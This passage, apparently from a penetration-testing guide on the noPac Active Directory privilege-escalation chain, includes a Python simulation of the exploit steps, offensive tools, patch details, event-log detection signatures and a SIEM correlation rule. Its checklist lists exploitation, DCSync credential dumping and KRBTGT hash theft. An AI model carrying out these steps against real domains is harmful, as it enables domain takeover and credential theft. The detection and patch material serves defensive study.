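    """AS exchange (step 3): exact lookup, then stamp PAC_REQUESTOR when patched."""
    acct = directory.get(cname)
    if acct is None:
        raise KdcError("AS-REQ: unknown principal")
    return Tgt(cname, acct.sid if pac_requestor else None)


def resolve_tgs_client(directory, tgt, pac_requestor):
    """TGS exchange (step 5): map the TGT's cname back to an account.

    CVE-2021-42287: when the cname no longer exists the KDC retries with '$'
    appended and builds the PAC for whatever it finds. The patched behaviour
    (modelled) keeps the lookup but refuses a ticket whose PAC_REQUESTOR SID
    is not the SID of the account it resolved to.
    """
    acct = directory.get(tgt.cname) or directory.get(tgt.cname + "$")
    if acct is None:
        raise KdcError("TGS-REQ: unknown principal")
    if pac_requestor and tgt.requestor_sid != acct.sid:
        raise KdcError("TGS-REQ: PAC_REQUESTOR does not match account SID")
    return acct


def run_chain(sam_hardened=False, pac_requestor=False):
    """Replay steps 2-5 of the manual procedure and report whose context we end up in."""
    directory = new_directory()
    try:
        rename_sam(directory, "ATTACKPC$", "DC01", sam_hardened)       # step 2
        tgt = issue_tgt(directory, "DC01", pac_requestor)               # step 3
        rename_sam(directory, "DC01", "ATTACKPC$", sam_hardened)        # step 4
        acct = resolve_tgs_client(directory, tgt, pac_requestor)        # step 5
    except KdcError as exc:
        return f"blocked: {exc}"
    return f"context of {acct.sam} ({'DC' if acct.is_dc else 'workstation'})"


if __name__ == "__main__":
    for flags in [(False, False), (True, False), (False, True), (True, True)]:
        print(f"sam_hardened={flags[0]}, pac_requestor={flags[1]}: {run_chain(*flags)}")
```

Either patch alone breaks the chain at a different step: the SAM hardening stops step 2, the PAC_REQUESTOR check stops step 5, which is why the validation checklist asks for both KBs to be present rather than one.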

## Tools and Resources

| Tool | Purpose | Platform |
|---|---|---|
| noPac (cube0x0) | Automated scanner and exploiter | Windows (.NET) |
| noPac (Ridter) | Alternative exploit implementation | Python |
| Impacket | Kerberos ticket manipulation, DCSync | Python |
| CrackMapExec | Vulnerability scanning module (`nopac`) | Python |
| Rubeus | Windows Kerberos ticket operations | Windows (.NET) |
| secretsdump.py | Post-exploitation credential dumping | Python |

## CVE Details

| CVE | Description | CVSS (Microsoft) | Patch |
|---|---|---|---|
| CVE-2021-42278 | sAMAccountName spoofing: the SAM did not require a computer account's sAMAccountName to end with `$`, so it can be set to a DC's name | 7.5 | KB5008102 |
| CVE-2021-42287 | KDC PAC confusion: when a TGT's client name matches no account, the KDC retries with `$` appended and issues service tickets in that account's context | 7.5 | KB5008380 |

## Detection Signatures

| Indicator | Detection Method |
|---|---|
| Machine account sAMAccountName change | Event 4742 (computer account changed) where the new SAM Account Name lacks the trailing `$` or equals a DC's name |
| New machine account creation | Event 4741 (computer object created), in particular by a non-administrative subject consuming MachineAccountQuota |
| TGT request for account without trailing `$` | Event 4768 (TGT requested) where the account name is a machine name without `$` |
| S4U2self requests from non-DC machine accounts | Event 4769 (service ticket requested) with unusual service ticket requests from a freshly created machine account |
| Rapid sequence: create account, rename, request TGT, rename back | SIEM correlation rule over 4741, 4742, 4768, 4742 and 4769 from one subject within a few minutes |

## Validation Criteria

- [ ] Domain scanned for noPac vulnerability
- [ ] MachineAccountQuota verified (default 10)
- [ ] Exploit executed successfully (shell or DCSync)
- [ ] Domain Admin privileges obtained from standard user
- [ ] DCSync performed to dump domain credentials
- [ ] KRBTGT hash obtained for persistence validation
- [ ] Attack chain documented with timestamps
- [ ] Patch status verified (KB5008102, KB5008380)

---
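The SIEM correlation rule from the Detection Signatures table, as an added example that is not part of the original skill or of any noPac tool. It runs over constructed sample Security-log events; the field names (`subject`, `target`, `new_sam`, `account`, `service`, `client`) are a simplification, and mapping the real EventData fields (TargetUserName, SamAccountName, ServiceName, IpAddress) onto them is left to the collector. The set of DC names is an assumption about the environment.

```python
"""Correlate Security-log events into the noPac attack pattern (added example)."""
from datetime import datetime, timedelta

# Assumption: sAMAccountNames of the domain controllers, without the '$'.
DC_NAMES = {"DC01"}

# Constructed sample events (not captured from a real DC); fields are simplified.
SAMPLE_EVENTS = [
    {"ts": "2021-12-13T09:00:00", "id": 4741, "subject": "helpdesk", "target": "WS042$"},
    {"ts": "2021-12-13T09:30:00", "id": 4768, "account": "jdoe", "client": "10.10.10.77"},
    {"ts": "2021-12-13T10:00:00", "id": 4741, "subject": "user", "target": "ATTACKPC$"},
    {"ts": "2021-12-13T10:00:05", "id": 4742, "subject": "user", "target": "ATTACKPC$", "new_sam": "DC01"},
    {"ts": "2021-12-13T10:00:08", "id": 4768, "account": "DC01", "client": "10.10.10.50"},
    {"ts": "2021-12-13T10:00:12", "id": 4742, "subject": "user", "target": "DC01", "new_sam": "ATTACKPC$"},
    {"ts": "2021-12-13T10:00:15", "id": 4769, "account": "DC01", "service": "ATTACKPC$", "client": "10.10.10.50"},
]


def _when(event):
    return datetime.fromisoformat(event["ts"])


def is_spoofed_dc_name(name, dc_names):
    """A sAMAccountName that equals a DC's name with the trailing '$' removed."""
    return not name.endswith("$") and name.upper() in {d.upper() for d in dc_names}


def correlate(events, dc_names, window=timedelta(minutes=5)):
    """Return one alert per suspected noPac chain.

    Each chain is anchored on a 4742 that sets a machine account's
    sAMAccountName to a DC name without '$' (CVE-2021-42278). Around that
    anchor, within `window`, the other stages are collected: the 4741 that
    created the account, the 4768 TGT request for the '$'-less name, the 4742
    that renames the account back, and a 4769 whose requesting account is the
    '$'-less name (the S4U2self of CVE-2021-42287).
    """
    ordered = sorted(events, key=_when)
    alerts = []
    for anchor in ordered:
        if anchor["id"] != 4742 or not is_spoofed_dc_name(anchor.get("new_sam", ""), dc_names):
            continue
        spoofed = anchor["new_sam"].upper()
        t0 = _when(anchor)
        stages = {"rename_to_dc_name"}
        for ev in ordered:
            delta = _when(ev) - t0
            if abs(delta) > window:
                continue
            if ev["id"] == 4741 and delta <= timedelta(0) and ev["target"] == anchor["target"]:
                stages.add("machine_account_created")
            elif ev["id"] == 4768 and delta >= timedelta(0) and ev["account"].upper() == spoofed:
                stages.add("tgt_for_spoofed_name")
            elif (ev["id"] == 4742 and delta > timedelta(0)
                  and ev["target"].upper() == spoofed and ev.get("new_sam", "").endswith("$")):
                stages.add("renamed_back")
            elif ev["id"] == 4769 and delta > timedelta(0) and ev["account"].upper() == spoofed:
                stages.add("s4u2self_as_spoofed_name")
        alerts.append({
            "subject": anchor["subject"],
            "spoofed_name": anchor["new_sam"],
            "first_seen": t0.isoformat(),
            "stages": sorted(stages),
            # The rename alone is already a CVE-2021-42278 indicator; a TGT or
            # S4U2self for the spoofed name means the chain reached the KDC.
            "severity": "critical" if stages & {"tgt_for_spoofed_name", "s4u2self_as_spoofed_name"} else "high",
        })
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS, DC_NAMES):
        print(alert)
```

Anchoring on the rename rather than on the 4741 keeps the rule quiet for ordinary machine joins (the `WS042$` event above never produces an alert) while still catching an attacker who reuses an existing machine account instead of creating one, in which case the `machine_account_created` stage is simply absent.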
